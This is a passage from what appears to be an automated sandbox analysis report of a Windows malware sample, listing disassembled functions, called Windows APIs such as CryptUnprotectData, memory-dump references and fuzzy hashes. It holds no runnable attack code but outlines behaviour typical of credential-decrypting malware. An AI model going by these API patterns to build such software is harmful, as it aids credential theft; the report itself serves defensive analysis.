                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $ n$0bm$0bm$0O\
                                • API String ID: 0-2677530187
                                • Opcode ID: 034902909c1fa3881002cdb4777daa40fd312e5763bc191a20c31ffda871b4bf
                                • Instruction ID: d6346a60c5333b5bc61d4f3e1c26e2c8fd35514815631a159930866b29ac9d18
                                • Opcode Fuzzy Hash: 034902909c1fa3881002cdb4777daa40fd312e5763bc191a20c31ffda871b4bf
                                • Instruction Fuzzy Hash: 9DB249F3A082049FE3046E2DEC8567AFBE9EF94720F16853DE6C5C3744EA7558018693
                                Function 00EB9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EA51D4,40000001,00000000,00000000,?,00EA51D4), ref: 00EB9050
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 62861d4d30881197b7e0d2a40ac91921cfae7682bc2b93feab1394f63cea8fcb
                                • Instruction ID: b76dd069f0136a363f3be77c2ca46b6ca778e75ecd545674278d5e052835efbf
                                • Opcode Fuzzy Hash: 62861d4d30881197b7e0d2a40ac91921cfae7682bc2b93feab1394f63cea8fcb
                                • Instruction Fuzzy Hash: DB11F574200208EFDF04EF64D894BEB37A9AF8A314F10A458FA299B341D775E9419BA0
                                Function 00EB7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01BFEE78,00000000,?,00EC0DF8,00000000,?,00000000,00000000), ref: 00EB7BF3
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7BFA
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01BFEE78,00000000,?,00EC0DF8,00000000,?,00000000,00000000,?), ref: 00EB7C0D
                                • wsprintfA.USER32 ref: 00EB7C47
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 490134a11591731fc85cda7a90be9d779fe8ef5607d3f91782843a99a473a15b
                                • Instruction ID: c7c93e5068373ec2b20e85f163ac9747a835027618eef3b7367603566252d690
                                • Opcode Fuzzy Hash: 490134a11591731fc85cda7a90be9d779fe8ef5607d3f91782843a99a473a15b
                                • Instruction Fuzzy Hash: 8B118EB1905218EBEB248F54DD49FAABB78FB44711F1003A9F629A33C0D7745A808F50
                                Function 012FA54D Relevance: 5.4, Strings: 3, Instructions: 1663COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2+$:w>$=~q
                                • API String ID: 0-3170428094
                                • Opcode ID: 181f33439d4be57c7db7880e8759bc5b4fe3b6063476fa8f0259b03aae570d70
                                • Instruction ID: 1eec8fb278f24c7f40ca15805e9bd74f87ba44ae0ee2188210f3035b780bdac4
                                • Opcode Fuzzy Hash: 181f33439d4be57c7db7880e8759bc5b4fe3b6063476fa8f0259b03aae570d70
                                • Instruction Fuzzy Hash: F0B209F360C2049FE308AE29EC4567AFBE9EFD4720F16893DE6C5C3744EA3558058696
                                Function 012F1DA4 Relevance: 5.4, Strings: 3, Instructions: 1637COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (Cyr$@}M$OBlu
                                • API String ID: 0-1330563399
                                • Opcode ID: cecf402a6a07a704180f09a85d1f449196f67326d2e128749f4edf13f4f2de27
                                • Instruction ID: a8e69948558d5aa7feda31a6e77e1ab7b62c9a5b3a46b204944448b378277e32
                                • Opcode Fuzzy Hash: cecf402a6a07a704180f09a85d1f449196f67326d2e128749f4edf13f4f2de27
                                • Instruction Fuzzy Hash: 60B249F3A0C2149FE304AE2DEC8567AF7E5EF94220F1A453DEAC4C7744E67598018697
                                Function 012F3962 Relevance: 5.4, Strings: 3, Instructions: 1618COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )?$=~n$D?;{
                                • API String ID: 0-4190960460
                                • Opcode ID: ecbaa53ea9681492aac4a121bfb540c4aca9e9b2054005cef48e3feeb2fddb06
                                • Instruction ID: 139f1bf0c9db0c3ba3b5c93a66ff46c2ccbb7295119d33c43eca16ffb913278e
                                • Opcode Fuzzy Hash: ecbaa53ea9681492aac4a121bfb540c4aca9e9b2054005cef48e3feeb2fddb06
                                • Instruction Fuzzy Hash: CAB217F360C2009FE304AE2DEC8567ABBE9EF94720F1A893DE6C4C7744E93558458697
                                Function 00EB3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00EBE120,00000000,00000001,00EBE110,00000000), ref: 00EB39A8
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EB3A00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 52deb3f8119649857d86635a5ab56f327cd650ecac65dd8b55258ceb51749eda
                                • Instruction ID: fabfb4a067770e13ac8a0968dc04390d14c87d7623b026f2f082c742cb7b9393
                                • Opcode Fuzzy Hash: 52deb3f8119649857d86635a5ab56f327cd650ecac65dd8b55258ceb51749eda
                                • Instruction Fuzzy Hash: C6411670A00A289FDB24DB58CC95BDBB7B5AB48302F5051D8E618E72D0D7B16EC5CF50
                                Function 012FE5C1 Relevance: 4.6, Strings: 3, Instructions: 831COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: JX{$N_^{$v2?o
                                • API String ID: 0-2411433865
                                • Opcode ID: c6c43845b8480d6430f0f815413df5d6b2a8734fac737744b113262110cb61ca
                                • Instruction ID: cff8bef988eee4c438d118a7db32b668d4ec77fe6e1b7aaad53ae85d8d761e5e
                                • Opcode Fuzzy Hash: c6c43845b8480d6430f0f815413df5d6b2a8734fac737744b113262110cb61ca
                                • Instruction Fuzzy Hash: 99423BF3A0C2009FE3086E2DEC9567ABBE9EFD4320F1A853DE6C5C7744E97558018696
                                Function 00EAA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EAA2D4
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EAA2F3
                                • LocalFree.KERNEL32(?), ref: 00EAA323
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 9a59df533d791d792d93a92e50da7e7106b901f5f30aa722a74d6248c8bf58f3
                                • Instruction ID: ca74ae93c4152b469232da36af2703b6bcf6e61b0b2364bcd875721f35888019
                                • Opcode Fuzzy Hash: 9a59df533d791d792d93a92e50da7e7106b901f5f30aa722a74d6248c8bf58f3
                                • Instruction Fuzzy Hash: CC11E8B4A00309DFCB04DFA4D889AAEB7B5FB89300F108569ED15A7390D730AE50CF61
                                Function 012EE76A Relevance: 4.1, Strings: 2, Instructions: 1633COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: dzX$w$u}
                                • API String ID: 0-3197744256
                                • Opcode ID: a388efae4a7fd397c66eb1421c187bdf971573e3bf0670fc3cff93329dbd55ed
                                • Instruction ID: bbec82ecfb08c66db5756ebce6e360850e84eced5b3ee69f77098b70e79237a7
                                • Opcode Fuzzy Hash: a388efae4a7fd397c66eb1421c187bdf971573e3bf0670fc3cff93329dbd55ed
                                • Instruction Fuzzy Hash: 73B2F8F360C204AFE304AF29EC8567AFBE9EF94720F1A492DE6C4C3744E63558018697
                                Function 012FC214 Relevance: 3.9, Strings: 2, Instructions: 1434COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Wio[$)p
                                • API String ID: 0-881582348
                                • Opcode ID: 34448db89584b1450e718b5ff8dc77d9d03573622eb5e7b494e8812ddc36fd3b
                                • Instruction ID: c473a957e1ee791ec217b920d52400df1bfec795763ea0bb84d57f5a2720b36f
                                • Opcode Fuzzy Hash: 34448db89584b1450e718b5ff8dc77d9d03573622eb5e7b494e8812ddc36fd3b
                                • Instruction Fuzzy Hash: 8CA215F3A0C204AFE3046E2DEC4567ABBE5EF94720F1A893DEAC5C3744E63558058697
                                Function 012F596A Relevance: 3.7, Strings: 2, Instructions: 1188COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
